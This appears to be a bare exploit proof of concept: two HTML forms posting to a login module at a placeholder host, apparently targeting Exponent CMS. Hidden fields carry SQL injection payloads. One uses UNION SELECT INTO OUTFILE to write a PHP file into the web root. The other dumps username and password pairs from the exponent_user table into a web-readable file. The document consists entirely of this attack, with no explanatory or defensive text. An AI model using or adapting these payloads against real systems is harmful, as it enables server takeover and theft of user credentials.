

&lt;form action=&quot;http://www.example.com/index.php&quot; method=&quot;post&quot; name=&quot;main&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;action&quot; value=&quot;login&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;int&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;module&quot; value=&quot;login&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;password&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;src&quot; value=&quot;&#039; UNION SELECT &#039;&lt;? phpinfo(); ?&gt;&#039; INTO OUTFILE &#039;/var/www/file.php&#039; -- &quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;username&quot; value=&quot;&#039; UNION SELECT &#039;&lt;? phpinfo(); ?&gt;&#039; INTO OUTFILE &#039;/var/www/file.php&#039; -- &quot;&gt;
&lt;input type=&quot;submit&quot; id=&quot;btn&quot;&gt;
&lt;/form&gt;


&lt;form action=&quot;http://www.example.com/index.php&quot; method=&quot;post&quot; name=&quot;main&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;action&quot; value=&quot;login&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;int&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;module&quot; value=&quot;login&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;password&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;src&quot; value=&quot;&#039; UNION SELECT CONCAT_WS(&#039;:&#039;,username,password) FROM `exponent_user` INTO OUTFILE &#039;/var/www/file.txt&#039; -- &quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;username&quot; value=&quot;&#039; UNION SELECT CONCAT_WS(&#039;:&#039;,username,password) FROM `exponent_user` INTO OUTFILE &#039;/var/www/file.txt&#039; -- &quot;&gt;
&lt;input type=&quot;submit&quot; id=&quot;btn&quot;&gt;
&lt;/form&gt;


